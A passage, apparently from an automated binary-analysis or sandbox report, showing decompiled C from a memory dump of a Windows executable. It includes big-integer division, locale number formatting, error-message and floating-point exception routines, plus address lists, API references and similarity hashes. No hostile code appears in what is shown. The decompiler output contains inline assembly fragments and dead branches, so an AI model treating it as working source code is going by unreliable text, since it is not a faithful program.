								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E001ADDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E001C0DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E001ADDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E001ADDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x1bd6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E001C0DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E001BAA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E001BAA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E001BAA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x001bc0bc
0x001bc0bf
0x001bc0c3
0x001bc0cd
0x001bc0d0
0x001bc0d2
0x001bc0d4
0x001bc0e1
0x001bc0e1
0x001bc0e4
0x001bc0e4
0x001bc0e7
0x001bc0ea
0x001bc0ec
0x001bc21f
0x001bc221
0x001bc26a
0x001bc26e
0x001bc274
0x001bc223
0x001bc225
0x001bc228
0x001bc22a
0x001bc22d
0x001bc22f
0x001bc231
0x001bc265
0x001bc265
0x001bc265
0x001bc233
0x001bc238
0x001bc23e
0x001bc23e
0x001bc241
0x001bc243
0x001bc245
0x00000000
0x00000000
0x001bc247
0x001bc248
0x001bc24b
0x001bc24e
0x001bc250
0x00000000
0x001bc252
0x00000000
0x001bc252
0x00000000
0x001bc250
0x001bc254
0x001bc25b
0x001bc25f
0x001bc263
0x00000000
0x00000000
0x001bc263
0x001bc266
0x001bc266
0x001bc268
0x001bc275
0x001bc278
0x001bc27b
0x001bc27e
0x001bc27e
0x001bc282
0x001bc285
0x001bc288
0x001bc28b
0x001bc296
0x001bc28d
0x001bc292
0x001bc292
0x001bc2a0
0x001bc2a5
0x001bc2a8
0x001bc2aa
0x001bc2b4
0x001bc2b7
0x001bc2be
0x001bc2c1
0x001bc2c4
0x001bc2cc
0x001bc2d2
0x001bc2d2
0x001bc2d2
0x001bc2d2
0x001bc2c4
0x001bc2d7
0x001bc2de
0x001bc2de
0x001bc2e1
0x001bc2e4
0x001bc516
0x001bc516
0x001bc2ea
0x001bc2ea
0x001bc2f0
0x001bc2f3
0x001bc2f6
0x001bc2f9
0x001bc2fc
0x001bc2ff
0x001bc302
0x001bc302
0x001bc305
0x001bc30c
0x001bc30c
0x001bc307
0x001bc307
0x001bc307
0x001bc30e
0x001bc312
0x001bc315
0x001bc317
0x001bc31a
0x001bc321
0x001bc324
0x001bc327
0x001bc332
0x001bc335
0x001bc33a
0x001bc33f
0x001bc346
0x001bc34b
0x001bc34d
0x001bc34f
0x001bc353
0x001bc356
0x001bc359
0x001bc361
0x001bc36a
0x001bc36a
0x001bc36c
0x001bc36f
0x001bc36f
0x001bc359
0x001bc379
0x001bc37e
0x001bc383
0x001bc385
0x001bc388
0x001bc38a
0x001bc38d
0x001bc390
0x001bc392
0x001bc395
0x001bc398
0x001bc39a
0x001bc3a1
0x001bc3a6
0x001bc3a9
0x001bc3b3
0x001bc3b5
0x001bc3b7
0x001bc3ba
0x001bc3ba
0x001bc3bc
0x001bc3bf
0x001bc3c2
0x001bc3c5
0x001bc3c8
0x001bc39c
0x001bc39c
0x001bc39f
0x00000000
0x00000000
0x001bc39f
0x001bc3cb
0x001bc3cd
0x001bc3cf
0x00000000
0x001bc3d1
0x001bc3d1
0x001bc3d4
0x001bc3d6
0x001bc3d6
0x001bc3e4
0x001bc3e7
0x001bc3ec
0x001bc3ee
0x00000000
0x00000000
0x001bc3f0
0x001bc3f7
0x001bc3f7
0x001bc3fa
0x001bc3fd
0x001bc400
0x001bc403
0x001bc403
0x001bc406
0x001bc409
0x001bc40d
0x001bc410
0x001bc412
0x001bc415
0x00000000
0x00000000
0x001bc417
0x001bc415
0x001bc3f2
0x001bc3f2
0x001bc3f5
0x00000000
0x00000000
0x00000000
0x00000000
0x001bc3f5
0x001bc41c
0x001bc41c
0x00000000
0x001bc41c
0x001bc419
0x00000000
0x001bc419
0x001bc3d4
0x001bc3cf
0x001bc41f
0x001bc41f
0x001bc421
0x001bc42b
0x001bc42b
0x001bc42e
0x001bc430
0x001bc432
0x001bc434
0x001bc439
0x001bc43c
0x001bc43c
0x001bc43f
0x001bc442
0x001bc445
0x001bc447
0x001bc45c
0x001bc45e
0x001bc460
0x001bc462
0x001bc464
0x001bc466
0x001bc468
0x001bc46a
0x001bc46d
0x001bc46d
0x001bc471
0x001bc473
0x001bc479
0x001bc47c
0x001bc47c
0x001bc47c
0x001bc480
0x001bc480
0x001bc485
0x001bc488
0x001bc488
0x001bc48d
0x001bc48f
0x001bc491
0x001bc498
0x001bc498
0x001bc49a
0x001bc49f
0x001bc4a1
0x001bc4a4
0x001bc4a4
0x001bc4a7
0x001bc4b0
0x001bc4b0
0x001bc4b2
0x001bc4b2
0x001bc4b7
0x001bc4bd
0x001bc4c1
0x001bc4c4
0x001bc4c7
0x001bc4c9
0x001bc4c9
0x001bc4c9
0x001bc4ce
0x001bc4ce
0x001bc4d1
0x001bc4d4
0x001bc493
0x001bc493
0x001bc496
0x00000000
0x00000000
0x001bc496
0x001bc491
0x001bc4db
0x001bc4db
0x001bc4dc
0x001bc423
0x001bc423
0x001bc425
0x00000000
0x00000000
0x001bc425
0x001bc4ec
0x001bc4f1
0x001bc4f4
0x001bc4f8
0x001bc4f9
0x001bc4fc
0x001bc4ff
0x001bc500
0x001bc503
0x001bc506
0x001bc509
0x001bc50c
0x001bc50c
0x001bc514
0x001bc51b
0x001bc51c
0x001bc51e
0x001bc520
0x001bc522
0x001bc525
0x001bc530
0x001bc530
0x001bc536
0x001bc536
0x001bc539
0x001bc53a
0x001bc53a
0x001bc530
0x001bc53e
0x001bc540
0x001bc542
0x001bc544
0x001bc544
0x001bc546
0x001bc54a
0x00000000
0x00000000
0x001bc54c
0x001bc54c
0x001bc54f
0x001bc551
0x00000000
0x00000000
0x00000000
0x001bc551
0x001bc544
0x001bc553
0x001bc55d
0x00000000
0x00000000
0x00000000
0x001bc268
0x001bc0f2
0x001bc0f2
0x001bc0f2
0x001bc0f5
0x001bc0f8
0x001bc0fb
0x001bc12c
0x001bc12e
0x001bc179
0x001bc17b
0x001bc182
0x001bc189
0x001bc18c
0x001bc18f
0x001bc195
0x001bc195
0x001bc196
0x001bc199
0x001bc1a0
0x001bc1a9
0x001bc1ae
0x001bc1b1
0x001bc1b6
0x001bc1b9
0x001bc1bb
0x001bc1c0
0x001bc1c3
0x001bc1c6
0x001bc1c6
0x001bc1c6
0x001bc1ca
0x001bc1cd
0x001bc1cd
0x001bc1d2
0x001bc1d2
0x001bc1dd
0x001bc1e8
0x001bc1e8
0x001bc1eb
0x001bc1f7
0x001bc1fc
0x001bc207
0x001bc209
0x001bc20b
0x001bc211
0x001bc216
0x001bc218
0x001bc21e
0x001bc130
0x001bc13c
0x001bc13c
0x001bc13f
0x001bc14f
0x001bc155
0x001bc15c
0x001bc15e
0x001bc166
0x001bc168
0x001bc16a
0x001bc16f
0x001bc172
0x001bc178
0x001bc178
0x001bc0fd
0x001bc100
0x001bc104
0x001bc10a
0x001bc119
0x001bc123
0x001bc12b
0x001bc12b
0x001bc0fb
0x001bc0d6
0x001bc0d9
0x001bc0df
0x001bc0df
0x001bc0c5
0x001bc0cb
0x001bc0cb

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
Instruction ID: 0ca81753e2267c084b8b8a811d36f40e2c75e4da2c1118875b3b17d8fdbf125a
Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
Instruction Fuzzy Hash: CA021C71E002199BDF14CFA9C8906EDBBF1FF98314F25816AE919E7284D731AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A9D99, Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A9D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x1cd610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x1ede30 = _v304;
					 *0x1ede32 = 0;
					 *0x1cd610 = 0x1ede30;
				}
				E0019F980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x1cd600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x001a9db1
0x001a9dbf
0x001a9dcc
0x001a9dd4
0x001a9dda
0x001a9dda
0x001a9df0
0x001a9df5
0x001a9dfa
0x001a9e04
0x001a9e0e
0x001a9e16
0x001a9e21

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001A9DBF
GetNumberFormatW.KERNEL32 ref: 001A9E0E

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a381f5bba9d633912d433b7da56c4ad2ff0d36fd0cff5ed97468cf56571da5ef
Instruction ID: 86999a09ed64a004bb9a67484e9e44e947ec00248b45a597fe6736fd3a4073d7
Opcode Fuzzy Hash: a381f5bba9d633912d433b7da56c4ad2ff0d36fd0cff5ed97468cf56571da5ef
Instruction Fuzzy Hash: 38017175100358BBDB108FA4EC45FAB7BBCEF19710F004426FA08DB150D3709954C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00196D06, Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00196D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00196d06
0x00196d0e
0x00000000
0x00196d35
0x00196d27
0x00196d2f
0x00000000

APIs

GetLastError.KERNEL32(001A0DE0,?,00000200), ref: 00196D06
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00196D27

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: fb8c05a445c63ecd8d3d004a8510c274a6552f8829571abc05cc33741b28e21d
Instruction ID: 2f97e66035840748bb056bac1915cc534e9ec0a64d5311343bb11249787b5056
Opcode Fuzzy Hash: fb8c05a445c63ecd8d3d004a8510c274a6552f8829571abc05cc33741b28e21d
Instruction Fuzzy Hash: D4D0C971388302BFFE110AB08C0AF2A7B95B755B86F208905B3A6E90E0DA70D064D629

Uniqueness

Uniqueness Score: -1.00%

Function 001C0654, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001C0654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E001BDFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E001BDF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x001c0662
0x001c0669
0x001c066e
0x001c0674
0x001c0677
0x001c067d
0x001c0682
0x001c0687
0x001c0687
0x001c068d
0x001c0692
0x001c0697
0x001c0697
0x001c069e
0x001c06a3
0x001c06a8
0x001c06a8
0x001c06af
0x001c06b4
0x001c06b9
0x001c06b9
0x001c06c0
0x001c06c5
0x001c06ca
0x001c06ca
0x001c06d2
0x001c06e2
0x001c06f4
0x001c0706
0x001c0719
0x001c072b
0x001c0733
0x001c0738
0x001c073d
0x001c073d
0x001c0744
0x001c0749
0x001c0749
0x001c0750
0x001c0755
0x001c0755
0x001c075c
0x001c0761
0x001c0761
0x001c0768
0x001c076d
0x001c076d
0x001c0777
0x001c0779
0x001c07b3
0x001c077b
0x001c0780
0x001c07a4
0x001c07ac
0x001c07a0
0x001c07a0
0x001c07b6
0x001c07bd
0x001c07bf
0x001c07e1
0x001c07e9
0x001c07ec
0x001c07ec
0x001c07ee
0x001c07ee
0x001c07f9
0x001c07ff
0x001c0804
0x001c080b
0x001c0845
0x001c0850
0x001c0856
0x001c0859
0x001c085c
0x001c0868
0x001c0870
0x001c080d
0x001c0810
0x001c081c
0x001c0822
0x001c0828
0x001c082b
0x001c0834
0x001c0834
0x001c0873
0x001c0881
0x001c0887
0x001c088e
0x001c0890
0x001c0890
0x001c0897
0x001c0899
